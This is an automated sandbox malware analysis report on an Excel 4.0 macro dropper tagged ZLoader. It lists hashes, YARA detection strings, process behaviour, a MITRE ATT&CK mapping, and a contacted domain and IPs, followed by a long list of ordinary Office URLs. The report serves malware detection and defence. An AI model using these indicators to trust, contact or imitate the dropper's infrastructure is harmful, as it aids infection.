Analysis Report doc2227740.xls

Overview

General Information

Sample Name: doc2227740.xls
Analysis ID: 320290
MD5: b43d8b40f9ef15965d0ff901e30c2f32
SHA1: 3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572
SHA256: 196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda
Tags: xls, ZLoader

Detection

Hidden Macro 4.0
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Yara detected Xls With Macro 4.0
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4092 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • MSOSYNC.EXE (PID: 2916 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: doc2227740.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0xbf4b:$s1: Excel
  • 0xfc43:$s1: Excel
  • 0x10187:$s1: Excel
  • 0x11376:$s1: Excel
  • 0x1574d:$s1: Excel
  • 0x157aa:$s1: Excel
  • 0x157cd:$s1: Excel
  • 0x38c6:$Auto_Close: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3A

Source: doc2227740.xls
Rule: JoeSecurity_XlsWithMacro4
Description: Yara detected Xls With Macro 4.0
Author: Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: doc2227740.xls, ReversingLabs: Detection: 20%
    Source: global traffic, DNS query: name: sherpa.rest
    Source: global traffic, TCP traffic: 192.168.2.7:49719 -> 104.27.172.15:443
    Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown, DNS traffic detected: queries for: sherpa.rest
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://messaging.office.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeapps.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift-user.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://settings.outlook.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://tasks.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723

    System Summary:

    Found Excel 4.0 Macro with suspicious formulas
    Source: doc2227740.xls Initial sample: EXEC
    Source: doc2227740.xls OLE indicator, VBA macros: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll
    Source: doc2227740.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engine Classification label: mal52.evad.winXLS@3/10@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user~1\AppData\Local\Temp\{6833D447-8750-434D-95BD-59BA45422FC2} - OProcSessId.dat
    Source: doc2227740.xls OLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts
    Source: doc2227740.xls ReversingLabs: Detection: 20%
    Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Window found: window name: SysTabControl32
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Automated click: OK
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: doc2227740.xls Initial sample: OLE document summary category = PmFbdwr0TuP
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: Yara match File source: doc2227740.xls, type: SAMPLE
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting 11 | DLL Side-Loading 1 | Process Injection 1 | Masquerading 1 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Exploitation for Client Execution 3 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 1 | LSASS Memory | System Information Discovery 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting 11 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading 1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    doc2227740.xls | 21% | ReversingLabs | Document-Excel.Dropper.SDrop |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source | Detection | Scanner | Label | Link
    sherpa.rest | 0% | Virustotal | | Browse

    URLs


    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    sherpa.rest | 104.27.172.15 | true | false | | unknown

    URLs from Memory and Binaries

                                                              unknown
                                                              https://analysis.windows.net/powerbi/api617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                        high

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.221.76 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
104.27.172.15 | unknown | United States | | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 320290
Start date: 19.11.2020
Start time: 08:54:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: doc2227740.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal52.evad.winXLS@3/10@2/2
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Max analysis timeout: 720s exceeded, the analysis took too long
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WinStore.App.exe, RuntimeBroker.exe, backgroundTaskHost.exe, ApplicationFrameHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted)
                                                                                                                                                        • Excluded domains from analysis (whitelisted)
                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        No simulations

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
